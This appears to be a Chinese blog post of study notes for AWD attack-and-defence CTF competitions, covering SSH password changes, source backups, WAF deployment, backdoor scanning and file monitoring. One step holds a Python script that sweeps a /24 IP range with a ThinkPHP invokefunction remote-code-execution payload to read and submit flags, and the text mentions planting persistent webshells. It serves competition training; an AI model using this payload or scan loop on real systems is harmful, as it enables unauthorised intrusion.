AWD攻防学习

最新推荐文章于 2024-07-08 15:54:41 发布
最新推荐文章于 2024-07-08 15:54:41 发布
阅读量1.3k 收藏 10
点赞数 1
分类专栏: CTF 文章标签: 安全 web安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_42172261/article/details/121873428
版权

1-源码备份,修改口令

xshell或者MobaXterm远程登录

修改ssh密码
passwd

打包目录
tar -zcvf file.tar.gz 要打包的目录
解包
tar -zxvf file.tar.gz

从服务器下载文件
scp [-p port] user@192.168.28.151:/home/user/a.txt b.txt
上传到服务器
scp b.txt user@192.168.28.151:/home/user/b.txt

2-部署各个环境的WAF(比赛规则)

ctf-awd-waf链接

https://github.com/DasSecurity-HatLab/AoiAWD

3-扫描源码中预留或隐藏后门

seay和D盾扫描后台预留后门,可发现攻击点。

4-代码审计配合流量监控及代码审计后续操作(框架及非框架,源码语言,漏洞库等)进行漏洞判定

5-实时监控当前目录文件上传删除等操作,有效防止恶意删除,上传后门等,后续可配合流量操作行为监控找出更多漏洞

运行minitor.py,实时监控文件变化情况;需要python2环境
sudo python minitor.py

6-批量flag实现自动获取及提交,写入不死马等操作,实现权限维持实时获取得分

import requests
from lxml import etree

headers = {'User-Agent':'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36'}
submit_url = "xxx"

for i in range(0, 255):
    url = "http://111.200.241.%s:55788" % i
    url += "/index.php?s=index/think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=cat /flag"
    res = requests.get(url, headers=headers).content.decode("utf-8")

    tree = etree.HTML(res)
    flag = str(tree.xpath('//div/span[2]/small/text()')[0])

    submit_flag_url = submit_url + flag
    requests.get(submit_flag_url)

工具下载链接 https://download.csdn.net/download/weixin_42172261/60970767

HFish(蜜罐)官网https://hfish.io/#/

OpenRASP(WAF)官网https://rasp.baidu.com/

H4ppyD0g
关注
专栏目录
awd的批量脚本 pwn_AWD攻防web入门篇
weixin_29210759的博客
01-01 1837
前言AWD(Attack With Defense,攻防兼备)模式是一个非常有意思的模式,你需要在一场比赛里要扮演攻击方和防守方,攻者得分,失守者会被扣分。也就是说,攻击别人的靶机可以获取 Flag 分数时,别人会被扣分,同时你也要保护自己的主机不被别人得分,以防扣分。常见操作 1. 修ssh密码当我们拿到服务器后,需要第一时间修密码防止被他人窃用 2. 1 修数...
速成AWD并获奖的学习方法和思考记录
2301_80115097的博客
04-29 479
心态很重要,不要催队友搞他心态哈哈哈哈不要自乱阵脚,我也算是三天速成AWD了,给大家分享的内容有限,后续我会继续学习更新。对于本次的成绩也算是认可,但是有点不甘心,因为获取到flag输出了俩遍,我没有注意到,我的心境乱了,导致我没有认真去分析我所发生的问题大家不要把全部经历投入与研究攻防,更多的时间应该跟组委会或者裁判去沟通网络环境、物理机环境、比赛环境等,要做到明白、清楚!举例如:你准备的脚本都是打C段的,万一举办方给的靶机环境都是一个队伍一个B段呢?这不就把你干懵逼了?
AWD之赛前培训.pptx
02-07
AWD比赛的赛前培训PPT
AWD神器—watchbird后台rce挖掘
最新发布
韩束一叶子
07-08 1345
闲来无事,偶然翻阅源码发现的小tips,因为省事自己用本机windows的phpstudy搭的,真实awd比赛一般都是linux环境,所以以上仅供参考!欢迎师傅们多多交流!
awd攻防总结
weixin_48427966的博客
05-12 222
su命令(su www-data、su apache)- 自己写一个木马(www-data/apache)kill 0 杀掉本用户的所有进程。不死马清除命令(注意权限问题)D盾扫描(无法找到ln后面)靶场搭建看什么链接了。
AWD攻防工具.zip
12-11
AWD攻防工具
AWD相关知识
02-19
CTF可以通过解题模式与竞赛级别进行不同方式的分类。在解题模式方向,主要可以分为夺旗模式与攻防模式;而在竞赛级别上则根据比赛类型的不同分为:国际性CTF竞赛、国家级信息安全竞赛、企业CTF与高校CTF等等不同级别。
AWD攻防比赛 PHP WAF
10-16
本话题主要围绕"AWD攻防比赛 PHP WAF"展开,探讨其核心概念、工作原理以及如何在实际比赛中发挥作用。 PHP WAF是一种基于PHP的Web应用防火墙,它的主要任务是对HTTP请求进行过滤和检查,防止恶意代码注入、SQL注入...
AWD攻防赛脚本集合.zip
07-18
"AWD攻防赛脚本集合.zip"是一个包含与网络安全竞赛相关的脚本资源的压缩文件。这类比赛通常称为AWD(Attack-Defend)或CTF(Capture The Flag)比赛,是网络安全领域的实战演练,旨在提升参赛者的攻防技能。在这样的...
awd网络攻防比赛平台.zip
08-24
计划或参加电赛的同学可以用来学习提升和参考。程序均是实战案例,经过测试可直接运行。 全国大学生电子设计竞赛(National Undergraduate Electronics Design Contest),试题,解决方案及源码。计划或参加电赛的...
自制AWD工具包.rar
03-05
【自制AWD工具包】是一个专门针对AWD(Adaptive Website Design)技术的自定义工具集合,它旨在帮助开发者和设计师更好地实现响应式网页设计...通过学习和使用这些工具,你可以更高效地创建出适应各种设备的优质网站。
awd攻防比赛总结——3s_NwGeek.docx
09-30
awd攻防比赛总结——3s_NwGeek.docx
基于python的awd网络攻防比赛平台源码+项目说明.zip
01-16
【资源说明】 1、该资源包括项目的全部源码,下载可以直接使用! 2、本项目适合作为计算机、数学、电子信息等专业的竞赛项目学习资料,作为参考学习借鉴。...基于python的awd网络攻防比赛平台源码+项目说明.zip
国赛分区赛awd赛后总结
Sumarua的博客
07-06 2076
简单来说就是三步 登录平台,查看规则,探索flag提交方式,比赛开始前有时间的话使用nmap或者httpscan等工具扫一下IP段,整理各队的IP(靶机的IP应该是比赛开始后才会给出) 登录ssh->dump源码->D盾去后门->一人写批量脚本,一个人去修->部署waf,流量监控 控制npc->加固npc(拿到别人的靶机也是一样),紧盯流量 下面来详细介绍具体流程 一般流程 1.登录比赛平台,查看比赛信息 这此国赛主办方没有ssh密码,而是提供rsa公私钥,使用ssh-key方
AWD 比赛小技巧 & 套路总结
algae
04-18 3981
AWD 比赛小技巧 & 套路总结 AWD 类型的线下赛我觉着靠的是平时积累的技巧和万年的手速(脚本),见的多了碰到问题应付起来就会容易些; 网上也有好多师傅们写的技巧,文末附上链接; 这篇临时写给某位伙计; List 1、备份。源码以及数据库,可以备份到隐蔽的目录(.xx)下,顺便down到本地(Win下:Winscp,FileZilla;Mac:scp,Transmit..); 2...
AWD基本步骤
qq_41672971的博客
12-07 1425
11111
AWD:web_yunnan_2
qq_38618396的博客
09-24 994
0x00 环境搭建 参考: team1:ctf:9a0b71fdda36c36506645794a4927e45 team2:ctf:4c79b2c32f29aec11a0545d440f5204b 0x01 漏洞&修复 后门漏洞证明 1、先登录ssh,然后现在自己服务器里面的文件,在通过D盾来扫描,查看是不是有什么后门,尽快排除后门: 从D盾上查看到2个地方可能存在后门,然后找到对应的文件,查看代码,发现 /includes/config.php中是一个后门: <?php echo 'h
CTF-AWD入门手册
Python栈
06-18 1231
今天给大家带来了AWD的入门知识点,AWD赛制也是CTF中常见的赛制,本文讲的AWD比赛中常见的知识点,可能会有许多的遗漏,望大家指出交流,如果对本文感兴趣不妨一键三连。CSDN大礼包:《黑客&网络安全入门&进阶学习资源包》免费分享🎁😝朋友们如果有需要全套《黑客&网络安全入门&进阶学习资源包》,可以扫描下方二维码免费领取1️⃣零基础入门① 学习路线对于从来没有接触过网络安全的同学,我们帮你准备了详细的学习成长路线图。可以说是最科学最系统的学习路线,大家跟着这个大的方向学习准没问题。② 路线对应学习视频。
AWD攻防系统框架有那些
03-25
常见的AWD攻防系统框架包括以下几种: 1. FBCTF:一个基于CTF比赛的AWD攻防系统,在网络分布式安全测试中广泛使用。 2. iCTF:一个开源的CTF比赛管理平台和AWD攻防系统,支持多个团队同时进行攻击和防御。 3. ...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

H4ppyD0g

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值